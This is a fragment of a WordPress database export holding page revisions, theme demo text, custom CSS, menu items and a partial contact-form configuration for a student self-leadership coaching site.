tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row parallax=\"yes\" color_scheme=\"white\" bg_overlay=\"dark\" content_width=\"fullwidth\" css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" darken=\"dark\" fullwidth=\"yes\"][vc_column][special_heading title=\"Our Featured Works\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\" color=\"dark\"][portfolio_carousel cats=\"branding,design,photography,video\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_subtitle=\"click for our all works\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_subtitle=\"send us a message\" button2_url=\"#contact\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][special_heading title=\"Our Skills\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"services\" bg_overlay=\"light\" css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"OUR SERVICES\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\" color=\"dark\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"prices\" color_scheme=\"white\" bg_overlay=\"darker\" css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\"][vc_column][special_heading title=\"Our Pricing Tables\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" featured=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-10-28 15:45:35','2020-10-28 15:45:35','',623,'http://highperformingstudent.com/2020/10/28/623-revision-v1/',0,'revision','',0),(2050,1,'2020-11-06 01:29:48','2020-11-06 01:29:48','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\n<p style=\"text-align: center;\">Through the development of six key skills, we help students max out their potential <span style=\"font-weight: 400;\">to live a healthy, happier and more productive life. </span>We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">modular online courses</a>.</p>\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\n\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>VISON</strong></p>\n<p style=\"text-align: center;\"><em><strong><span style=\"text-decoration: underline;\">What you focus on is sought out by your Reticular Activating System.</span> </strong></em>(Learn more from the University of Minnesota <a href=\"https://extension.umn.edu/two-you-video-series/ras\">here</a>)</p>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>ROUTINES</strong></p>\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><em><strong>Scientists say your morning mood affects your productivity and relationships for the rest of the day</strong></em></span>. (read the full study <a href=\"https://faculty.wharton.upenn.edu/wp-content/uploads/2013/01/Rothbard-Wilk_AMJ_Final.pdf\">here</a>)</p>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>ACCOUNTABILITY</strong></p>\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><strong>I</strong></span><em style=\"font-weight: bold;\"><span style=\"text-decoration: underline;\"><strong>f</strong> you have a specific accountability appointment, you will increase your chance of success by up to 95%”</span>  </em>(read the full study <a href=\"https://medium.com/the-mission/the-accountability-effect-a-simple-way-to-achieve-your-goals-and-boost-your-performance-8a07c76ef53a#:~:text=The%20American%20Society%20of%20Training,success%20by%20up%20to%2095%25.\">here</a>)</p>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>MINDFULNESS</strong></p>\n<p style=\"text-align: center;\"><strong><span style=\"text-decoration: underline;\">Students who meditated had <em>15% better math scores, showed 24% more social behaviours, were 24% less aggressive.</em>..</span></strong> (read the full article <a href=\"https://time.com/3682311/mindfulness-math/\">here</a>)</p>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>GOAL SETTING</strong></p>\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">You\'re 42 percent more likely to achieve your goals if you write them down.</span>  </em></strong>(read the full study <a href=\"https://braveheartsales.com/wp-content/uploads/Goals-Research-Summary.pdf?x60870\">here</a>)</p>\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"13\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\n<p style=\"text-align: center;\"><strong>SELF-CONFIDENCE</strong></p>\n<p style=\"text-align: center;\"><strong><em><span style=\"text-decoration: underline;\">“Setting goals is linked to self-confidence, motivation, and autonomy (Locke &amp; Latham, 2006).”</span>  </em></strong>(read the full study <a href=\"https://www.psychologytoday.com/ca/blog/the-moment-youth/201803/goal-setting-is-linked-higher-achievement\">here</a>)</p>\n[/vc_column_text][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-autosave-v1','','','2020-11-06 01:29:48','2020-11-06 01:29:48','',7,'http://highperformingstudent.com/2020/10/28/7-autosave-v1/',0,'revision','',0),(2051,1,'2020-10-28 15:57:26','2020-10-28 15:57:26','<p>[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION...\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\">Help students build better habits, communicate more effectively and become better leaders.  We accomplish this through our podcast, book, self-leadership seminars, and online courses.  </p>\r\n<!-- /wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]</p>','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 15:57:26','2020-10-28 15:57:26','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2052,1,'2020-10-28 16:13:17','2020-10-28 16:13:17','','121A4544','','inherit','open','closed','','121a4544','','','2020-10-28 16:18:39','2020-10-28 16:18:39','',7,'http://highperformingstudent.com/wp-content/uploads/2020/10/121A4544.jpg',0,'attachment','image/jpeg',0),(2053,1,'2020-10-28 16:23:21','2020-10-28 16:23:21','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION...\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build better habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility. His goal is to provide people of all ages with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them. And it all started with…garbage. At the age of 17, he co-founded PickWaste, a grassroots initiative that brings people together to pick up trash in their communities. That experience confirmed to him how small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his inspiring and entertaining presentations have reached thousands of students across Canada and his High Performing Student program has made a difference for young people in 6 countries around the world. He’s delivered two TEDx talks, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 16:23:21','2020-10-28 16:23:21','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2054,1,'2020-10-28 16:34:55','2020-10-28 16:34:55','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build better habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  Since 2017, the organization has filled over 2000 bags of litter.  That experience confirmed to him how small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 16:34:55','2020-10-28 16:34:55','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2056,1,'2020-10-28 16:55:59','2020-10-28 16:55:59','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.login-now {\n	color: #ff670f;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 16:55:59','2020-10-28 16:55:59','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2057,1,'2020-10-28 17:06:20','2020-10-28 17:06:20','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\"><em>Help students build better habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</em></p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 17:06:20','2020-10-28 17:06:20','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2058,1,'2020-10-28 19:31:04','2020-10-28 19:31:04','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build better habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 19:31:04','2020-10-28 19:31:04','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2061,1,'2020-10-28 21:22:15','2020-10-28 21:22:15','','Programs','','publish','closed','closed','','speaking-2','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/?p=2061',4,'nav_menu_item','',0),(2063,1,'2020-10-28 21:22:15','2020-10-28 21:22:15','','Results','','publish','closed','closed','','results-2','','','2020-10-29 00:21:09','2020-10-29 00:21:09','',0,'http://highperformingstudent.com/?p=2063',3,'nav_menu_item','',0),(2100,1,'2020-10-29 00:22:59','2020-10-29 00:22:59','{\"id\":\"2100\",\"field_id\":3,\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"First Name*\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"Last Name*\",\"last_default\":\"\",\"label_hide\":\"1\",\"sublabel_hide\":\"1\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"large\",\"placeholder\":\"Email Address*\",\"confirmation_placeholder\":\"\",\"label_hide\":\"1\",\"default_value\":\"\",\"css\":\"\",\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"How can we help 